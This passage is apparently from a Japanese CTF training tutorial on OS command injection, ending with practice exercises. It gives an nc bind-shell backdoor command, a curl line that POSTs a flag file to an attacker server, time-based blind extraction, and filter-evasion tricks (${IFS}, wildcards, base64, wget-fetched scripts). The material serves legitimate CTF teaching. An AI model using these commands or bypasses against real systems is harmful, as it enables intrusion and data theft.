/bin/shを実行すると1234ポートにtelnetするだけでシェルが使い放題になります。嬉しいですね。任意のポート番号が使える状態でないと使えないテクニックですが、かなり有効です。 ncコマンドについて ncコマンドはTCP・UDPでネットワーク越しにデータを送受信できるコマンドです（これを使うと人間が使い方を覚えてさえいればHTTPの通信もSMTPの通信も思いのままです）オプションの意味は以下のとおりです。 -lリッスンモードにする。相手からの通信を待ち受けることができる。 -nIPアドレス・ポート番号の名前解決を行わない。 1234ポート番号を指定する。 -e /bin/sh接続されたあと、/bin/shとやりとりさせる外部への送信アプリそのものの出力に頼るのではなく、外部に情報を送信させるのは最も有力な手段の一つです。例えば、攻撃者のWebサーバにFLAGをPOSTするなどの手法がこれに当たります。（例:cat /flag | curl [url] -X POST -d @-） time based攻撃最終手段です。sleepによる遅延を発生させることができる場合、「もしフラグの1文字目がaならばsleep 2を実行」「もしフラグの1文字目がbならばsleep 2を実行」…といったように各文字について総当たりでリクエストを飛ばすことにより、sleepされるかされないかの情報を元にフラグを得ることが出来ます（実際の攻撃では、時間短縮のために良い感じに二分探索するコードを書くことが多いでしょう）。特殊な記号や文字列を含むコマンドが実行できないインジェクション可能な場所に何らかのバリデーションやエスケープが効いている場合もあります。CTFの問題にそのような制約がある場合、実は回避可能である場合と、そうでない場合があります。そうでない場合というのは、そこ以外に何らかの脆弱性があるということです。頑張って他の脆弱性を探しましょう。他の記号で代用するセミコロン複数のコマンドを実行できるのは;に限りません。&とか|とかも使えますし、状況によっては`hoge`とか\nとかも使えます。空白文字空白文字もたまに使えないことがあります。${IFS}で代用するのが楽ですが、{cd,..}でcd ..が実行されるテクもよく使われます。 ${なんか}はシェルの変数です。${IFS}はシェルにおいて、区切り文字が入っている変数です。先にバックドアを作ったり、外部から攻撃スクリプトをダウンロードさせたりするバックドアは上述の通りです。任意のポート番号が使えない場合は外部からwgetコマンドなどで攻撃スクリプトをダウンロードすることを考える必要があります。エスケープそのものを回避するエスケープそのものを回避することが出来るパターンもあります。例えば、クライアント側でしか上記のようなバリデーションが実行されていない場合、ブラウザを使わずにPostmanなどで直接アクセスすれば良いです。ワイルドカード flagという文字列がブロックされる場合でも、シェルのワイルドカード機能を用いてcat f?ag.txtって指定してもflag.txtが見られます。ファイル名が分からない場合はcat *などと雑に指定してしまうのも手です。 ?は任意の1文字に、*は0文字以上に、[abc]はa,b,cのいずれかの文字に、[!0-9]は数字以外の文字にマッチします。 base64でエンコードする base64にエンコードして送信すると、文字種が限定できます。長さがN文字以内のコマンドしか実行できないバックドアの作成のほか、攻撃用スクリプトを攻撃者のWebサーバーからダウンロードさせ、それを実行するなどの手法で回避できます。ネットワーク接続が制限されている場合、分割して複数のリクエストに分けて送信し、最後にまとめて実行する、などの手法も取れます。過去のCPCTFでは上記のようなテクニックが一切使えず単純にコードゴルフをすることを要求する問題が出たそうです。怖いですね。権限が足りない sudoやcronを確認したり、都合の良い権限で動いているプロセス/動く実行ファイルを探したりしてみましょう。実はバイナリとの融合問題だった、みたいな場合もあります… そのほか出力文字数が制限されている場合や、先にデータベースに攻撃コードを蓄積させておく必要がある場合など様々な制約がつくことがあります。ググりフォースとひらめき力でなんとかしましょう。演習 https://pearl.ramdos.net/ 問題ファイル： https://drive.google.com/drive/folders/1Mfq8kNzR5gIE72-dHDI32D4_ZIFwcknC?usp=sharing ヒント perlのopen関数は少し特殊なふるまいをします。perl openなどで検索してみましょう。演習（おまけ①）上の演習問題を、バックドアを作ったり、外部に送信したり、あるいはtime basedな攻撃をしたりして、ブラインドの条件下で攻撃してみましょう。演習（おまけ②：ボツ問題） https://ctf-escape.trap.show/index.php <pre><form action="index.php" method="get"> <input name="key" type="text"> <input value="検索する" type="submit"> </form> </pre>